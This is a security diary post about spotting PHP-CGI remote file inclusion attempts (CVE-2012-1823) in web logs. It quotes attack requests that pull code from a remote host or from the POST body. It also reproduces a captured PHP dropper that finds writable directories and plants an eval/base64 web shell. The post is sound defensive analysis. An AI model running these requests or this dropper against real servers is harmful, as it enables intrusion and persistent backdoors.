CSAM - RFI with a small twist

Published: 2013-10-07. Last Updated: 2013-10-08 00:30:55 UTC
by Mark Hofman (Version: 1)
1 comment(s)
Logs are under appreciated.  We all collect them, but in a majority of organisations you will find that they are only ever looked at once something has gone wrong.  Which is unfortunately usually when people discover that either they didn't collect "that" log or timestamps are out of whack, log files rolled over, etc.  Which is unfortunate because log files can tell you quite a bit of information as we are hoping to show throughout October as part of the Cyber Security Awareness Month. 
 
What have I been finding in my logs the last few weeks?  SQLi of course.  There was an increase in SQLi activity in the APAC region the past two weeks, but the one thing that caught my eye was a remote file inclusion attempt. 
 
 GET /index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://removedIP/echo.txt
 
 Turns out this was an oldie that has been going around for quite some time  (https://isc.sans.edu/diary/PHP+vulnerability+CVE-2012-1823+being+exploited+in+the+wild/13312/ )
 
 But there is a more interesting variation that is starting to turn up:
 
 POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input
 
The php code to be included is provided in the post itself.  The PHP code scans the local drives on the server, identifies any writeable files and if identified executes more PHP. 
 <?php
set_time_limit(0);
 
function scandirs($start , $level) {
.$wdirs = array();
.$handle = opendir($start);
.while (false !== ($file = readdir($handle))) {
..if ($file=='.'||$file=='..') continue;
..$pfile = $start.'/'.$file;
..if ( is_dir($pfile) && is_readable($pfile) && strpos($file,'.')!==0 ){
...if (is_writable($pfile)) $wdirs[]=$pfile;
...if ($level>0) $wdirs = array_merge($wdirs,scandirs($pfile , $level-1));
..}
.}
.closedir($handle);
.return $wdirs;
}
$sn='';$r=rand(5,8);for($i=0;$i<$r;$i++){$sn.=chr(rand(97,122));}$sn.='.php';
$dr = $_SERVER['DOCUMENT_ROOT'];
$dr = ($dr[strlen($dr)-1]=='/' || $dr[strlen($dr)-1]=='\\')?substr($dr, 0 , strlen($dr)-1):$dr;
$wa_dirs = scandirs($dr , 2);
 
if(is_writeable($dr))$wa_dirs[]='';
 
//print_r($wa_dirs);
 
foreach ($wa_dirs as $d) {
.$spn=substr($d, strlen($dr)).'/'.$sn;
.if($f=fopen($dr.$spn,'w')){
..fputs($f,"<?php eval(base64_decode('LyptS---snip----y8qfHpyP0UrKi8=')); ?>");fclose($f);
..exit('--start-check'.'string--'.$spn.'--end-check'.'string--');
.}
}

Another interesting twist was that once it was detected that the packet was dropped they fragmented the packets in order to attempt to circumvent the FW/IPS in place.

If you see similar please let us know.  I'd be interested to compare the samples.  In the mean time these requests will be fairly obvious in your web logs, so should  be easy enough to pick out.  

Happy hunting

Mark  

Keywords:
1 comment(s)

Comments

Your reference URL (https://isc.sans.edu/diary/PHP+vulnerability+CVE-2012-1823+being+exploited+in+the+wild/13312/) takes us to the most current Diary entry.

Did you mean to use this one? (https://isc.sans.edu/forums/diary/PHP+vulnerability+CVE-2012-1823+being+exploited+in+the+wild/13312)

Diary Archives